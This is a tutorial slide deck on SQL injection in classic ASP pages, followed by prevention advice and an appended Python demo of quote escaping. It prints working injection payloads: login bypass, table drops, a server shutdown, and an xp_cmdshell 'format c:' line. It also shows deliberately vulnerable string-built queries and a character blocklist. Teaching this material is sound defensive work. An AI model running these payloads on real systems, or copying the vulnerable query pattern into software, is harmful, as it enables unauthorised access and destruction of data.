SQL Injection Attacks
Siddhesh Bhobe
Copyright Persistent Systems Pvt. Ltd.
http://www.eusersolutions.com
SQL Injection Attack…
…"injects" or manipulates SQL code using "string-building" techniques.
By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways.
Attacks succeed because of poor input validation at the code layer.
Example 1: HTML Form
Consider the following HTML form for Login:
<form name="frmLogin" action="login.asp" method="post">
  Username: <input type="text" name="userName">
  Password: <input type="password" name="password">
  <input type="submit">
</form>
Example 1: ASP Script
<%
…
' Read the submitted form fields; no validation is applied
userName = Request.Form("userName")
password = Request.Form("password")
' Build the SQL text by concatenation: the raw input is spliced straight
' into the query, so a quote in the input ends the literal (the injection point)
query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'"
…
%>
Sample Input
Login = john, Password = doe
select count(*) from users where userName='john' and userPass='doe'
Now check this!
Login = john, Password = ' or 1=1 --
select count(*) from users where userName='john' and userPass='' or 1=1 --'
The password check is nullified.
The -- comments out the rest of the query, so the trailing quote does not cause a mismatched-quote error.
And what about this?
Username: ' or 1=1 -- and Password: [Empty]
select count(*) from users where userName='' or 1=1 --' and userPass=''
Example 2
Username: ' having 1=1 -- , Password: [Empty]
select userName from users where userName='' having 1=1
You get a column name…
You will get the following error message:
Microsoft OLE DB Provider for SQL Server (0x80040E14) Column 'users.userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/login.asp, line 16
The Attack…
Username: ' or users.userName like 'a%' --
select userName from users where userName='' or users.userName like 'a%' --' and userPass=''
Logged In As admin!!!
Use of Semi-colon
A semicolon allows multiple queries to be specified on one line.
They are submitted as one batch and executed sequentially:
select 1; select 1+2; select 1+3;
Can you guess what happens?
Username: ' or 1=1; drop table users; --
Table dropped!
Username: ' or 1=1; drop table users; -- and Password: [Anything]
First, it selects the userName field for all rows in the users table.
Second, it drops the users table.
SHUTDOWN WITH NOWAIT!!
…causes SQL Server to shut down, immediately stopping the Windows service.
Username: '; shutdown with nowait; --
select userName from users where userName=''; shutdown with nowait; --' and userPass=''
Products.asp
http://localhost/products.asp?productId=1 returns Got product Pink Hoola Hoop
But what about this?
http://localhost/products.asp?productId=0;insert%20into%20products(prodName)%20values(left(@@version,50))
Wham!
Here's the query without the URL-encoded spaces:
http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50))
This runs an INSERT on the products table, adding the first 50 characters of SQL Server's @@version variable as a new record in the products table.
Effects
Privilege Level: sa
Total control of SQL Server
OS Shell at privilege of MSSQLServer service using xp_cmdshell
Ability to read, write, mutilate all data
Effects
Privilege Level: db_owner
Read/write all data in affected database
Drop tables
Create new objects
Take control of the database
Effects
Privilege Level: normal user (no fixed server or database roles)
Access objects to which permission is given
At best, only a few stored procedures
At worst, read/write access to all tables
This is the recommended privilege level!
Testing for Vulnerability
Disable error handling so that database errors are displayed
Input single quotes to see whether the application fails
A failure indicates poor validation: the quote has corrupted the SQL
Preventing SQL Injection Attacks
Limit User Access
Escape Quotes
Remove culprit characters
Limit length of user input
Limit User Access
Do not use the "sa" account
Remove extended stored procedures (SPs) you are not using. Two of the most damaging ones are:
xp_cmdshell
xp_grantlogin
Use stored procedures to abstract data access
Escape Quotes
Convert each single quote into two single quotes, so that user input can no longer close a string literal:
<%
' Every single quote in the input is replaced by two
function stripQuotes(strWords)
    stripQuotes = replace(strWords, "'", "''")
end function
%>
Converts
select count(*) from users where userName='john' and userPass='' or 1=1 --'
...to this:
select count(*) from users where userName='john' and userPass=''' or 1=1 --'
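The login query from Example 1 and the stripQuotes() defence above, as an added example that is not part of the original deck: a Python port runs both the raw string-building query and the quote-escaped one against a constructed in-memory SQLite users table (SQLite in place of SQL Server; the table, rows and function names are assumptions) and shows that the ' or 1=1 -- input logs in against the first builder and fails against the second.

```python
import sqlite3

# Constructed sample data, not from the original deck.
SAMPLE_USERS = [("john", "doe"), ("admin", "s3cret")]

def make_db():
    """In-memory users table shaped like the one in the deck's login query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (userName text, userPass text)")
    conn.executemany("insert into users values (?, ?)", SAMPLE_USERS)
    return conn

def build_query_vulnerable(user_name, password):
    # Same string-building as login.asp: input is spliced into the SQL text,
    # so a quote in the input ends the literal and the rest becomes SQL.
    return ("select count(*) from users where userName='" + user_name
            + "' and userPass='" + password + "'")

def strip_quotes(s):
    # Port of the deck's stripQuotes(): each ' becomes '' so it can no
    # longer close a string literal.
    return s.replace("'", "''")

def build_query_escaped(user_name, password):
    return build_query_vulnerable(strip_quotes(user_name), strip_quotes(password))

def login_ok(conn, query):
    # The application treats count(*) > 0 as a successful login.
    return conn.execute(query).fetchone()[0] > 0

def demo():
    """Run the deck's inputs through both builders; returns {builder: {case: bool}}."""
    conn = make_db()
    cases = {
        "valid": ("john", "doe"),
        "wrong_pass": ("john", "nope"),
        "inject_pass": ("john", "' or 1=1 --"),   # Example 1, password field
        "inject_user": ("' or 1=1 --", ""),       # Example 1, username field
    }
    builders = {"vulnerable": build_query_vulnerable, "escaped": build_query_escaped}
    return {name: {case: login_ok(conn, b(u, p)) for case, (u, p) in cases.items()}
            for name, b in builders.items()}

if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

Escaping only neutralises the quote; the driver's own `?` placeholders (parameterised queries) keep user input out of the SQL text altogether and are the stronger fix.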
Drop culprit characters
Drop character sequences such as ;, --, insert and xp_
select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; --
becomes
select prodName from products where id=1 cmdshell ''format c: /q /yes '' database myDB
Restrict length of user input
Limit length in the form field
Use validating functions for numeric input
Use POST, not GET
Thanks!
Original Article:
http://www.webmasterbase.com/article.php?aid=794&pid=0
Also on Reismagos…